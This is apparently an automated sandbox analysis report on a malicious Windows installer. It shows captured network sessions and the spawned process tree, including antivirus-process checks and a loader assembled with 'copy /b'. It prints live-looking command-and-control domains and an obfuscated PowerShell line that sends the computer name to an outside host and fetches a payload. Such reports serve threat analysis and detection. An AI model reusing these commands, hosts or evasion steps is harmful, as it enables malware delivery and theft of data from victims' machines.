2025-01-10 22:37:33 UTC	1085	OUT	Data Raw: 2d 2d 31 55 42 36 32 41 59 56 4a 45 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 36 41 36 39 36 39 37 39 30 37 44 46 34 44 34 34 38 31 36 37 30 33 33 42 42 33 30 33 38 35 37 0d 0a 2d 2d 31 55 42 36 32 41 59 56 4a 45 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 31 55 42 36 32 41 59 56 4a 45 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 44 4e 4f 0d 0a 2d 2d 31 55 42 36 32 41 59 56 4a 45 34 0d 0a 43 6f 6e 74 65 6e Data Ascii: --1UB62AYVJE4Content-Disposition: form-data; name="hwid"E6A69697907DF4D448167033BB303857--1UB62AYVJE4Content-Disposition: form-data; name="pid"1--1UB62AYVJE4Content-Disposition: form-data; name="lid"hRjzG3--DNO--1UB62AYVJE4Conten
2025-01-10 22:37:34 UTC	1132	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 22:37:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=rqvo6d5dc6f8ngekahjjshi51m; expires=Tue, 06 May 2025 16:24:13 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ov6NL9WnIz8T5WHPEbvo%2FoBSK9nWbaOCCtoo1nK9EUXWAl42DBK2Z0io1413FuJAjnBa1%2BMVgMkcRfJ%2FNLmvqLxqpdCWznpdoVkdJ2lbDiLPF%2FbgzpXueoHXwQcL0Dp5rLHnhg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900026ff7e0b188d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1620&min_rtt=1613&rtt_var=620&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1996&delivery_rate=1742243&cwnd=174&unsent_bytes=0&cid=b70daee9ace00339&ts=528&x=0"
2025-01-10 22:37:34 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-10 22:37:34 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49992	188.114.96.3	443	3792	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com

Timestamp	Bytes transferred	Direction	Data
2025-01-10 22:37:34 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 112 Host: enthuasticsa.cyou
2025-01-10 22:37:34 UTC	112	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 44 4e 4f 26 6a 3d 65 66 64 65 62 64 65 30 35 37 61 31 64 66 33 66 37 63 31 35 62 37 66 34 64 61 39 30 37 63 32 64 26 68 77 69 64 3d 45 36 41 36 39 36 39 37 39 30 37 44 46 34 44 34 34 38 31 36 37 30 33 33 42 42 33 30 33 38 35 37 Data Ascii: act=get_message&ver=4.0&lid=hRjzG3--DNO&j=efdebde057a1df3f7c15b7f4da907c2d&hwid=E6A69697907DF4D448167033BB303857
2025-01-10 22:37:36 UTC	1145	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 22:37:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=beiubc5a435s4v4g82mce8ahe8; expires=Tue, 06 May 2025 16:24:15 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Si4dIdtxpH9pG1avg%2BJ3XySh%2BxURBzByDFjmmwxMuFHs%2Fvb%2BYNaUt8mJK%2BER%2BaY2w2zuYRRZtopEJwd7Acx1tlnyoktD%2BFbfg%2FocYXI4QhVnHdQIL1Y1UtqI%2FOn%2FDtQciIpkHg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90002705dc9541b4-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1750&min_rtt=1745&rtt_var=666&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1014&delivery_rate=1630374&cwnd=209&unsent_bytes=0&cid=931d2caacba78d57&ts=1515&x=0"
2025-01-10 22:37:36 UTC	218	IN	Data Raw: 64 34 0d 0a 57 56 4d 47 77 71 71 33 45 74 68 70 50 71 62 53 67 41 51 72 35 57 55 74 78 79 31 43 47 4a 48 6f 34 62 46 67 67 73 77 63 4c 4c 49 43 4b 43 53 33 69 49 30 77 73 42 31 4b 31 71 47 36 57 41 53 35 53 6b 36 69 53 6a 63 32 34 6f 43 4f 77 54 79 74 39 43 6b 62 68 6d 74 6c 4e 50 61 65 67 55 37 33 47 56 61 49 70 76 68 77 43 63 6c 48 53 37 4d 50 65 43 71 39 79 6f 53 54 57 72 4f 78 4d 46 65 51 4c 48 45 38 34 4d 4c 44 5a 71 67 61 42 50 72 39 33 43 74 41 69 51 78 64 6f 45 49 73 62 66 6e 47 6b 74 6b 50 38 70 41 7a 52 64 77 74 44 47 57 75 32 75 68 68 73 41 67 51 30 71 72 30 4a 67 66 48 41 31 6e 6c 46 33 49 30 73 34 33 44 69 31 44 2f 6b 51 3d 3d 0d 0a Data Ascii: d4WVMGwqq3EthpPqbSgAQr5WUtxy1CGJHo4bFggswcLLICKCS3iI0wsB1K1qG6WAS5Sk6iSjc24oCOwTyt9CkbhmtlNPaegU73GVaIpvhwCclHS7MPeCq9yoSTWrOxMFeQLHE84MLDZqgaBPr93CtAiQxdoEIsbfnGktkP8pAzRdwtDGWu2uhhsAgQ0qr0JgfHA1nlF3I0s43Di1D/kQ==
2025-01-10 22:37:36 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49993	185.161.251.21	443	3792	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com

Timestamp	Bytes transferred	Direction	Data
2025-01-10 22:37:37 UTC	201	OUT	GET /8574262446/ph.txt HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: cegu.shop
2025-01-10 22:37:37 UTC	249	IN	HTTP/1.1 200 OK Server: nginx/1.26.2 Date: Fri, 10 Jan 2025 22:37:37 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 329 Last-Modified: Thu, 26 Dec 2024 00:07:06 GMT Connection: close ETag: "676c9e2a-149" Accept-Ranges: bytes
2025-01-10 22:37:37 UTC	329	IN	Data Raw: 5b 4e 65 74 2e 73 65 72 76 69 63 65 70 4f 49 4e 54 6d 41 4e 61 47 65 72 5d 3a 3a 53 45 63 55 52 69 54 79 50 72 4f 74 6f 43 4f 6c 20 3d 20 5b 4e 65 74 2e 53 65 63 55 72 69 54 79 70 72 4f 74 6f 63 6f 6c 74 59 50 65 5d 3a 3a 74 4c 73 31 32 3b 20 24 67 44 3d 27 68 74 74 70 73 3a 2f 2f 64 66 67 68 2e 6f 6e 6c 69 6e 65 2f 69 6e 76 6f 6b 65 72 2e 70 68 70 3f 63 6f 6d 70 4e 61 6d 65 3d 27 2b 24 65 6e 76 3a 63 6f 6d 70 75 74 65 72 6e 61 6d 65 3b 20 24 70 54 53 72 20 3d 20 69 57 72 20 2d 75 52 69 20 24 67 44 20 2d 75 53 65 62 41 53 49 63 70 41 52 73 69 4e 67 20 2d 55 73 45 72 41 47 65 6e 74 20 27 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 37 2e Data Ascii: [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.

Target ID:	0
Start time:	17:36:40
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\Setup.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Setup.exe"
Imagebase:	0x400000
File size:	1'131'073 bytes
MD5 hash:	85A94E425D3175EF500BE48D4C9D3603
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	17:36:41
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c move Shoppercom Shoppercom.cmd & Shoppercom.cmd
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	17:36:41
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	17:36:43
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0xcc0000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	17:36:43
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "opssvc wrsa"
Imagebase:	0x3e0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	17:36:44
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0xcc0000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	17:36:44
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Imagebase:	0x3e0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	17:36:44
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c md 598591
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	17:36:44
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\extrac32.exe
Wow64 process (32bit):	true
Commandline:	extrac32 /Y /E Advertise
Imagebase:	0x720000
File size:	29'184 bytes
MD5 hash:	9472AAB6390E4F1431BAA912FCFF9707
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	17:36:45
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /V "Findarticles" Stockings
Imagebase:	0x3e0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	17:36:45
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b 598591\Preceding.com + Expiration + Rights + Addiction + Intensity + Surfing + Jam + Dramatically + Human + Enlarge 598591\Preceding.com
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	17:36:45
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b ..\Cd + ..\Invite + ..\Reproduce + ..\Greensboro + ..\Nervous + ..\Few + ..\Since o
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	17:36:45
Start date:	10/01/2025
Path:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com
Wow64 process (32bit):	true
Commandline:	Preceding.com o
Imagebase:	0x280000
File size:	947'288 bytes
MD5 hash:	62D09F076E6E0240548C2F837536A46A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	14
Start time:	17:36:45
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):	true
Commandline:	choice /d y /t 5
Imagebase:	0xe0000
File size:	28'160 bytes
MD5 hash:	FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	18.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	20.7%
Total number of Nodes:	1525
Total number of Limit Nodes:	34

Executed Functions

Function 004050CD Relevance: 68.5, APIs: 36, Strings: 3, Instructions: 295
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 0040512F
GetDlgItem.USER32(?,000003EE), ref: 0040513E
GetClientRect.USER32(?,?), ref: 00405196
GetSystemMetrics.USER32(00000015), ref: 0040519E
SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
ShowWindow.USER32(?,00000008), ref: 0040523A
GetDlgItem.USER32(?,000003EC), ref: 0040525B
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
GetDlgItem.USER32(?,000003F8), ref: 0040514D

Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6

Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

GetDlgItem.USER32(?,000003EC), ref: 004052AB
CreateThread.KERNELBASE(00000000,00000000,Function_00005047,00000000), ref: 004052B9
CloseHandle.KERNELBASE(00000000), ref: 004052C0
ShowWindow.USER32(00000000), ref: 004052E7
ShowWindow.USER32(?,00000008), ref: 004052EC
ShowWindow.USER32(00000008), ref: 00405333
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
CreatePopupMenu.USER32 ref: 00405376
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
GetWindowRect.USER32(?,?), ref: 0040539E
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
OpenClipboard.USER32(00000000), ref: 0040540B
EmptyClipboard.USER32 ref: 00405411
GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
GlobalLock.KERNEL32(00000000), ref: 00405427
SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
GlobalUnlock.KERNEL32(00000000), ref: 0040545D
SetClipboardData.USER32(0000000D,00000000), ref: 00405468
CloseClipboard.USER32 ref: 0040546E

Strings

{, xrefs: 00405352
New install of "%s" to "%s", xrefs: 00405182
@rD, xrefs: 004053D7

Memory Dump Source

Source File: 00000000.00000002.2208713460.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2208687940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208746197.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208992070.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
String ID: @rD$New install of "%s" to "%s"${
API String ID: 2110491804-2409696222
Opcode ID: 71b8ecf663d6f058a1c3ced55927feebbdcf1e8b0d86afd2c4b352cd48bee751
Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
Opcode Fuzzy Hash: 71b8ecf663d6f058a1c3ced55927feebbdcf1e8b0d86afd2c4b352cd48bee751
Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59

Function 00403883 Relevance: 54.6, APIs: 22, Strings: 9, Instructions: 304
filestringcomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#17.COMCTL32 ref: 004038A2
SetErrorMode.KERNELBASE(00008001), ref: 004038AD
OleInitialize.OLE32(00000000), ref: 004038B4

Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327

SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
CoUninitialize.COMBASE(?), ref: 00403AD1
ExitProcess.KERNEL32 ref: 00403AF1
lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40

Strings

\Temp, xrefs: 00403A1B
/D=, xrefs: 004039A6
1C, xrefs: 00403B56
_?=, xrefs: 00403A64
NSIS Error, xrefs: 004038E2
NCRC, xrefs: 0040397C
SeShutdownPrivilege, xrefs: 00403C16
~nsu.tmp, xrefs: 00403AF7
Error launching installer, xrefs: 00403A7D

Memory Dump Source

Source File: 00000000.00000002.2208713460.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2208687940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208746197.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208992070.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
API String ID: 2435955865-239407132
Opcode ID: 5d9024d5f0e899f809313532158b428341dd342d07cfae74060de4bd372621f4
Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
Opcode Fuzzy Hash: 5d9024d5f0e899f809313532158b428341dd342d07cfae74060de4bd372621f4
Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E

Function 00406805 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 00406926
\Microsoft\Internet Explorer\Quick Launch, xrefs: 004069DF
@%F, xrefs: 00406A53
@%F, xrefs: 0040682C

Memory Dump Source

Source File: 00000000.00000002.2208713460.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2208687940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208746197.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208992070.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 3581403547-784952888
Opcode ID: 93666727498e5f08fd38b631bc67a6e1ad40de3ecc08933b567c44a166c18943
Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
Opcode Fuzzy Hash: 93666727498e5f08fd38b631bc67a6e1ad40de3ecc08933b567c44a166c18943
Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D

Function 004074BB Relevance: 5.4, APIs: 4, Instructions: 382
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2208713460.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2208687940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208746197.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208992070.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86

Function 004062FC Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
GetProcAddress.KERNEL32(00000000), ref: 00406327

Memory Dump Source

